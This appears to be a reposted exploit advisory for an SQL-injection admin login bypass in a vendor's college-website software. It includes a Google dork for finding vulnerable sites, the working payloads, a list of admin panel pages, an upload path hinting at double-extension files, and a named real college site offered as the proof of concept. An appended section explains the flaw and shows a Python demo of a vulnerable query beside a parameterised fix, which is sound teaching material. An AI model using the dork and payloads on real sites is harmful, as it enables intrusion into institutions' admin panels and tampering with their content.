Design By Dr. Hardik Desai Developed By Chirag Lad India Admin Login Bypass Vulnerability

2018.06.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-592

#################################################################################################
# Exploit Title : Design By Dr. Hardik Desai Developed By Chirag Lad India Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : chiraglad.in
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork : intext:''Design By Dr. Hardik Desai | Developed By Chirag Lad''
# Administration Control Panel Path => /admin/
# Exploit : Both are accepted as login credentials: [ '=''or' ] or [ anything' OR 'x'='x ]

Username : anything' OR 'x'='x
Password : anything' OR 'x'='x

Usable Administration Control Panel URL Links =>

/admin/dashboard.php
/admin/about_index.php
/admin/about_edit.php
/admin/trustees_index.php
/admin/trustees_edit.php
/admin/facilities_index.php
/admin/facilities_edit.php
/admin/college_index.php
/admin/college_edit.php
/admin/course_edit.php
/admin/course_index.php
/admin/coursecontent_index.php
/admin/coursecontent_create.php
/admin/faculty_index.php
/admin/faculty_edit.php
/admin/comittees_index.php
/admin/comittees_create.php
/admin/activitymenu_index.php
/admin/activitymaster_index.php
/admin/activitymaster_edit.php
/admin/activitysub_index.php
/admin/activitysub_edit.php
/admin/activityrecords_index.php
/admin/activityrecords_edit.php
/admin/awardscategory_index.php
/admin/awards_index.php
/admin/awards_edit.php
/admin/placementmenu_index.php
/admin/placementmenu_edit.php
/admin/placement_index.php
/admin/placement_create.php
/admin/contact_details.php
/admin/alumni_details.php
/admin/news_index.php
/admin/news_create.php
/admin/staff_index.php
/admin/staff_create.php
/admin/change_password.php

Uploaded Files Path through Admin Panel =>

/admin/uploaded_files/[RANDOM-NUMBERS-ALPHABETS-yourfilename.png] .jpg .gif .pdf .html .htm shtml.jpg

#################################################################################################
# Example Site => naranlalacollege.in => [ Proof of Concept for the Vulnerability ] => archive.is/4mYlj
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
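The bypass above is a classic SQL injection in a login query: the quote in the submitted username and password closes the string literal and appends OR 'x'='x', which makes the WHERE clause true for every row. The following added example (not the vendor's code; the table, column names and credentials are constructed for the demo) reproduces the vulnerable query pattern against an in-memory SQLite table beside the hardened form that binds the username as a parameter and compares the password outside SQL in constant time. The second payload listed in the advisory ('=''or') depends on MySQL's loose type comparison and is not reproduced here.

```python
import sqlite3
import hmac

# Constructed demo credentials; not taken from the advisory.
ADMIN_USER = "admin"
ADMIN_PASS = "S3cret!"
PAYLOAD = "anything' OR 'x'='x"   # payload quoted in the advisory


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's admin table (constructed)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO admin (username, password) VALUES (?, ?)", (ADMIN_USER, ADMIN_PASS))
    con.commit()
    return con


def vulnerable_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    """The bug class in the advisory: user input is spliced into the SQL text,
    so a quote in the input rewrites the WHERE clause instead of being data."""
    sql = (f"SELECT id FROM admin WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone() is not None


def fixed_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: the username is bound as a parameter, so it is only ever
    compared as a value, and the password check happens outside SQL in constant
    time. In production the stored value would be a password hash verified with
    the hashing library's own verify routine; plaintext is kept here only to
    mirror the demo table."""
    row = con.execute("SELECT password FROM admin WHERE username = ?", (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], password)


def demo() -> dict:
    """Run both login variants against the payload and against real credentials."""
    con = setup_db()
    return {
        "vuln_with_payload": vulnerable_login(con, PAYLOAD, PAYLOAD),
        "fixed_with_payload": fixed_login(con, PAYLOAD, PAYLOAD),
        "fixed_with_real_creds": fixed_login(con, ADMIN_USER, ADMIN_PASS),
        "fixed_with_bad_pass": fixed_login(con, ADMIN_USER, "wrong"),
    }


if __name__ == "__main__":
    print(demo())
```

A web application firewall or access log review can flag the bypass by looking for quote characters followed by OR in login form fields, but the fix is parameterised queries, not input filtering.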

Copyright 2019, cxsecurity.com